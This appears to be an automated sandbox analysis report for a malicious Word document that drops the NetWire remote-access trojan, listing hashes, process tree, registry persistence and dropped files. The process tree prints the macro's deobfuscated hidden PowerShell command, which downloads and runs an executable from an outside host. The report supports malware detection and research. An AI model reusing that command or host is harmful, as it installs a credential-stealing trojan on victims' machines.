netwire | ca7d0cd170dc326645352637b21087e96576f33aafebcb59cb3ea28952d7214d

Analysis

max time kernel
81s
max time network
143s
platform
windows7_x64
resource
win7v20201028
submitted
13-01-2021 09:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Pokana2021011357.doc
Size

55KB
MD5

9a59fc2435737333486d786264c40542
SHA1

19ccdcf1cdafdd248080f7a0b4a481057125ebdf
SHA256

ca7d0cd170dc326645352637b21087e96576f33aafebcb59cb3ea28952d7214d
SHA512

eddb242b35355a91000d124a13bce5df1a929282f9ebf4554c261b14a1c473e75bf3c0d657f521b78d07e687ce26a749713a5aa9ffc908a53106b94744c69be5

Score

10^/10

netwire botnet persistence rat stealer

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://one.oziriss.club:2095/ol/o1.exe

Signatures

NetWire RAT payload 6 IoCs

rat

Processes:

resource	yara_rule
behavioral1/memory/1920-35-0x000000000009242D-mapping.dmp	netwire
behavioral1/memory/1920-34-0x0000000000090000-0x00000000000C0000-memory.dmp	netwire
behavioral1/memory/1920-37-0x0000000000090000-0x00000000000C0000-memory.dmp	netwire
behavioral1/memory/1336-45-0x00000000000D242D-mapping.dmp	netwire
behavioral1/memory/1336-44-0x00000000000D0000-0x0000000000100000-memory.dmp	netwire
behavioral1/memory/1336-47-0x00000000000D0000-0x0000000000100000-memory.dmp	netwire

Netwire
Netwire is a RAT with main functionalities focused password stealing and keylogging, but also includes remote control capabilities as well.
botnet stealer netwire

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	1916	1580	powershell.exe	WINWORD.EXE

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

6 1916 powershell.exe
Executes dropped EXE 4 IoCs

Processes:

secure.exesecure.exefers.exefers.exe

pid process

1696 secure.exe
1920 secure.exe
1384 fers.exe
1336 fers.exe
Loads dropped DLL 7 IoCs

Processes:

powershell.exesecure.exesecure.exefers.exe

pid process

1916 powershell.exe
1916 powershell.exe
1916 powershell.exe
1916 powershell.exe
1696 secure.exe
1920 secure.exe
1384 fers.exe

flow	pid	process
6	1916	powershell.exe

pid	process
1696	secure.exe
1920	secure.exe
1384	fers.exe
1336	fers.exe

pid	process
1916	powershell.exe
1916	powershell.exe
1916	powershell.exe
1916	powershell.exe
1696	secure.exe
1920	secure.exe
1384	fers.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

fers.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\	fers.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run\fers = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Crypto\\fers.exe"	fers.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

secure.exefers.exe

description	pid	process	target process
PID 1696 set thread context of 1920	1696	secure.exe	secure.exe
PID 1384 set thread context of 1336	1384	fers.exe	fers.exe

Drops file in Windows directory 1 IoCs

Processes:

WINWORD.EXE

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE
Office loads VBA resources, possible macro or embedded object present

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

Modifies Internet Explorer settings 1 TTPs 9 IoCs

adware spyware

Modify Registry

T1112

Processes:

WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

1580 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

1916 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1916 powershell.exe

pid	process
1916	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1916	powershell.exe

Suspicious use of SetWindowsHookEx 16 IoCs

Processes:

WINWORD.EXE

pid	process
1580	WINWORD.EXE
1580	WINWORD.EXE
1580	WINWORD.EXE
1580	WINWORD.EXE
1580	WINWORD.EXE
1580	WINWORD.EXE
1580	WINWORD.EXE
1580	WINWORD.EXE
1580	WINWORD.EXE
1580	WINWORD.EXE
1580	WINWORD.EXE
1580	WINWORD.EXE
1580	WINWORD.EXE
1580	WINWORD.EXE
1580	WINWORD.EXE
1580	WINWORD.EXE

Suspicious use of WriteProcessMemory 36 IoCs

Processes:

WINWORD.EXEpowershell.exesecure.exesecure.exefers.exe

description	pid	process	target process
PID 1580 wrote to memory of 1916	1580	WINWORD.EXE	powershell.exe
PID 1580 wrote to memory of 1916	1580	WINWORD.EXE	powershell.exe
PID 1580 wrote to memory of 1916	1580	WINWORD.EXE	powershell.exe
PID 1580 wrote to memory of 1916	1580	WINWORD.EXE	powershell.exe
PID 1916 wrote to memory of 1696	1916	powershell.exe	secure.exe
PID 1916 wrote to memory of 1696	1916	powershell.exe	secure.exe
PID 1916 wrote to memory of 1696	1916	powershell.exe	secure.exe
PID 1916 wrote to memory of 1696	1916	powershell.exe	secure.exe
PID 1916 wrote to memory of 1696	1916	powershell.exe	secure.exe
PID 1916 wrote to memory of 1696	1916	powershell.exe	secure.exe
PID 1916 wrote to memory of 1696	1916	powershell.exe	secure.exe
PID 1696 wrote to memory of 1920	1696	secure.exe	secure.exe
PID 1696 wrote to memory of 1920	1696	secure.exe	secure.exe
PID 1696 wrote to memory of 1920	1696	secure.exe	secure.exe
PID 1696 wrote to memory of 1920	1696	secure.exe	secure.exe
PID 1696 wrote to memory of 1920	1696	secure.exe	secure.exe
PID 1696 wrote to memory of 1920	1696	secure.exe	secure.exe
PID 1696 wrote to memory of 1920	1696	secure.exe	secure.exe
PID 1696 wrote to memory of 1920	1696	secure.exe	secure.exe
PID 1696 wrote to memory of 1920	1696	secure.exe	secure.exe
PID 1920 wrote to memory of 1384	1920	secure.exe	fers.exe
PID 1920 wrote to memory of 1384	1920	secure.exe	fers.exe
PID 1920 wrote to memory of 1384	1920	secure.exe	fers.exe
PID 1920 wrote to memory of 1384	1920	secure.exe	fers.exe
PID 1920 wrote to memory of 1384	1920	secure.exe	fers.exe
PID 1920 wrote to memory of 1384	1920	secure.exe	fers.exe
PID 1920 wrote to memory of 1384	1920	secure.exe	fers.exe
PID 1384 wrote to memory of 1336	1384	fers.exe	fers.exe
PID 1384 wrote to memory of 1336	1384	fers.exe	fers.exe
PID 1384 wrote to memory of 1336	1384	fers.exe	fers.exe
PID 1384 wrote to memory of 1336	1384	fers.exe	fers.exe
PID 1384 wrote to memory of 1336	1384	fers.exe	fers.exe
PID 1384 wrote to memory of 1336	1384	fers.exe	fers.exe
PID 1384 wrote to memory of 1336	1384	fers.exe	fers.exe
PID 1384 wrote to memory of 1336	1384	fers.exe	fers.exe
PID 1384 wrote to memory of 1336	1384	fers.exe	fers.exe

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Pokana2021011357.doc"
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1580

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://one.oziriss.club:2095/ol/o1.exe',$env:Temp+'\secure.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\secure.exe')
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1916

C:\Users\Admin\AppData\Local\Temp\secure.exe
"C:\Users\Admin\AppData\Local\Temp\secure.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1696

C:\Users\Admin\AppData\Local\Temp\secure.exe
C:\Users\Admin\AppData\Local\Temp\secure.exe
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1920

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\fers.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\fers.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1384

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\fers.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\fers.exe
6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1336

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\secure.exe
MD5
b61d866837ca60df01c1465e028db4c9

SHA1
53d4b6d751dcbf1cf6d8de3f8f50aedc2896d66a

SHA256
b6c6f8ac58b7838c87ccf2b36b2f7005c6dd86792575e1e8c7ccce30d7d6a878

SHA512
f02ece67642717bc55896d8802c6011e7023741583f05c09d626d326b5eba968ba3e7ccdde9c846d62389caf9ed9f6d63977fec2bd57195203f1b79cfff78070

Download Submit
C:\Users\Admin\AppData\Local\Temp\secure.exe
MD5
b61d866837ca60df01c1465e028db4c9

SHA1
53d4b6d751dcbf1cf6d8de3f8f50aedc2896d66a

SHA256
b6c6f8ac58b7838c87ccf2b36b2f7005c6dd86792575e1e8c7ccce30d7d6a878

SHA512
f02ece67642717bc55896d8802c6011e7023741583f05c09d626d326b5eba968ba3e7ccdde9c846d62389caf9ed9f6d63977fec2bd57195203f1b79cfff78070

Download Submit
C:\Users\Admin\AppData\Local\Temp\secure.exe
MD5
b61d866837ca60df01c1465e028db4c9

SHA1
53d4b6d751dcbf1cf6d8de3f8f50aedc2896d66a

SHA256
b6c6f8ac58b7838c87ccf2b36b2f7005c6dd86792575e1e8c7ccce30d7d6a878

SHA512
f02ece67642717bc55896d8802c6011e7023741583f05c09d626d326b5eba968ba3e7ccdde9c846d62389caf9ed9f6d63977fec2bd57195203f1b79cfff78070

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\fers.exe
MD5
b61d866837ca60df01c1465e028db4c9

SHA1
53d4b6d751dcbf1cf6d8de3f8f50aedc2896d66a

SHA256
b6c6f8ac58b7838c87ccf2b36b2f7005c6dd86792575e1e8c7ccce30d7d6a878

SHA512
f02ece67642717bc55896d8802c6011e7023741583f05c09d626d326b5eba968ba3e7ccdde9c846d62389caf9ed9f6d63977fec2bd57195203f1b79cfff78070

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\fers.exe
MD5
b61d866837ca60df01c1465e028db4c9

SHA1
53d4b6d751dcbf1cf6d8de3f8f50aedc2896d66a

SHA256
b6c6f8ac58b7838c87ccf2b36b2f7005c6dd86792575e1e8c7ccce30d7d6a878

SHA512
f02ece67642717bc55896d8802c6011e7023741583f05c09d626d326b5eba968ba3e7ccdde9c846d62389caf9ed9f6d63977fec2bd57195203f1b79cfff78070

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\fers.exe
MD5
b61d866837ca60df01c1465e028db4c9

SHA1
53d4b6d751dcbf1cf6d8de3f8f50aedc2896d66a

SHA256
b6c6f8ac58b7838c87ccf2b36b2f7005c6dd86792575e1e8c7ccce30d7d6a878

SHA512
f02ece67642717bc55896d8802c6011e7023741583f05c09d626d326b5eba968ba3e7ccdde9c846d62389caf9ed9f6d63977fec2bd57195203f1b79cfff78070

Download Submit
C:\Users\Admin\AppData\Roaming\trftkoxoicklgdxkctuphueti84738.png
MD5
8c6e2f2f47f6433efebd829c18f864d1

SHA1
15ebffc420841a18c1d47b6b40cfd9e7c632cf47

SHA256
94dcac78e40e701792770b08478c6b2c788ec0a21a953d82e6f968a1cef8698d

SHA512
86e2226fdb5bee0369d8f38bfb2e27270b9edd2b2d7c2fba76bacf51e8a53eeee1f21183bb7b75138757f198fe8513c423ce7fcbd7a740f37ca9ee68601c14db

Download Submit
\Users\Admin\AppData\Local\Temp\secure.exe
MD5
b61d866837ca60df01c1465e028db4c9

SHA1
53d4b6d751dcbf1cf6d8de3f8f50aedc2896d66a

SHA256
b6c6f8ac58b7838c87ccf2b36b2f7005c6dd86792575e1e8c7ccce30d7d6a878

SHA512
f02ece67642717bc55896d8802c6011e7023741583f05c09d626d326b5eba968ba3e7ccdde9c846d62389caf9ed9f6d63977fec2bd57195203f1b79cfff78070

Download Submit
\Users\Admin\AppData\Local\Temp\secure.exe
MD5
b61d866837ca60df01c1465e028db4c9

SHA1
53d4b6d751dcbf1cf6d8de3f8f50aedc2896d66a

SHA256
b6c6f8ac58b7838c87ccf2b36b2f7005c6dd86792575e1e8c7ccce30d7d6a878

SHA512
f02ece67642717bc55896d8802c6011e7023741583f05c09d626d326b5eba968ba3e7ccdde9c846d62389caf9ed9f6d63977fec2bd57195203f1b79cfff78070

Download Submit
\Users\Admin\AppData\Local\Temp\secure.exe
MD5
b61d866837ca60df01c1465e028db4c9

SHA1
53d4b6d751dcbf1cf6d8de3f8f50aedc2896d66a

SHA256
b6c6f8ac58b7838c87ccf2b36b2f7005c6dd86792575e1e8c7ccce30d7d6a878

SHA512
f02ece67642717bc55896d8802c6011e7023741583f05c09d626d326b5eba968ba3e7ccdde9c846d62389caf9ed9f6d63977fec2bd57195203f1b79cfff78070

Download Submit
\Users\Admin\AppData\Local\Temp\secure.exe
MD5
b61d866837ca60df01c1465e028db4c9

SHA1
53d4b6d751dcbf1cf6d8de3f8f50aedc2896d66a

SHA256
b6c6f8ac58b7838c87ccf2b36b2f7005c6dd86792575e1e8c7ccce30d7d6a878

SHA512
f02ece67642717bc55896d8802c6011e7023741583f05c09d626d326b5eba968ba3e7ccdde9c846d62389caf9ed9f6d63977fec2bd57195203f1b79cfff78070

Download Submit
\Users\Admin\AppData\Local\Temp\secure.exe
MD5
b61d866837ca60df01c1465e028db4c9

SHA1
53d4b6d751dcbf1cf6d8de3f8f50aedc2896d66a

SHA256
b6c6f8ac58b7838c87ccf2b36b2f7005c6dd86792575e1e8c7ccce30d7d6a878

SHA512
f02ece67642717bc55896d8802c6011e7023741583f05c09d626d326b5eba968ba3e7ccdde9c846d62389caf9ed9f6d63977fec2bd57195203f1b79cfff78070

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Crypto\fers.exe
MD5
b61d866837ca60df01c1465e028db4c9

SHA1
53d4b6d751dcbf1cf6d8de3f8f50aedc2896d66a

SHA256
b6c6f8ac58b7838c87ccf2b36b2f7005c6dd86792575e1e8c7ccce30d7d6a878

SHA512
f02ece67642717bc55896d8802c6011e7023741583f05c09d626d326b5eba968ba3e7ccdde9c846d62389caf9ed9f6d63977fec2bd57195203f1b79cfff78070

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Crypto\fers.exe
MD5
b61d866837ca60df01c1465e028db4c9

SHA1
53d4b6d751dcbf1cf6d8de3f8f50aedc2896d66a

SHA256
b6c6f8ac58b7838c87ccf2b36b2f7005c6dd86792575e1e8c7ccce30d7d6a878

SHA512
f02ece67642717bc55896d8802c6011e7023741583f05c09d626d326b5eba968ba3e7ccdde9c846d62389caf9ed9f6d63977fec2bd57195203f1b79cfff78070

Download Submit
memory/1336-45-0x00000000000D242D-mapping.dmp

Download
memory/1336-44-0x00000000000D0000-0x0000000000100000-memory.dmp

Filesize
192KB

Download
memory/1336-47-0x00000000000D0000-0x0000000000100000-memory.dmp

Filesize
192KB

Download
memory/1384-39-0x0000000000000000-mapping.dmp

Download
memory/1580-2-0x00000000006E4000-0x00000000006E8000-memory.dmp

Filesize
16KB

Download
memory/1696-30-0x0000000000000000-mapping.dmp

Download
memory/1916-7-0x0000000004650000-0x0000000004651000-memory.dmp

Filesize
4KB

Download
memory/1916-16-0x0000000006190000-0x0000000006191000-memory.dmp

Filesize
4KB

Download
memory/1916-25-0x00000000064B0000-0x00000000064B1000-memory.dmp

Filesize
4KB

Download
memory/1916-3-0x0000000000000000-mapping.dmp

Download
memory/1916-24-0x0000000006400000-0x0000000006401000-memory.dmp

Filesize
4KB

Download
memory/1916-17-0x00000000062B0000-0x00000000062B1000-memory.dmp

Filesize
4KB

Download
memory/1916-4-0x000000006AFA0000-0x000000006B68E000-memory.dmp

Filesize
6.9MB

Download
memory/1916-11-0x00000000056D0000-0x00000000056D1000-memory.dmp

Filesize
4KB

Download
memory/1916-6-0x00000000046D0000-0x00000000046D1000-memory.dmp

Filesize
4KB

Download
memory/1916-5-0x0000000001E60000-0x0000000001E61000-memory.dmp

Filesize
4KB

Download
memory/1916-8-0x0000000005280000-0x0000000005281000-memory.dmp

Filesize
4KB

Download
memory/1920-35-0x000000000009242D-mapping.dmp

Download
memory/1920-34-0x0000000000090000-0x00000000000C0000-memory.dmp

Filesize
192KB

Download
memory/1920-37-0x0000000000090000-0x00000000000C0000-memory.dmp

Filesize
192KB

Download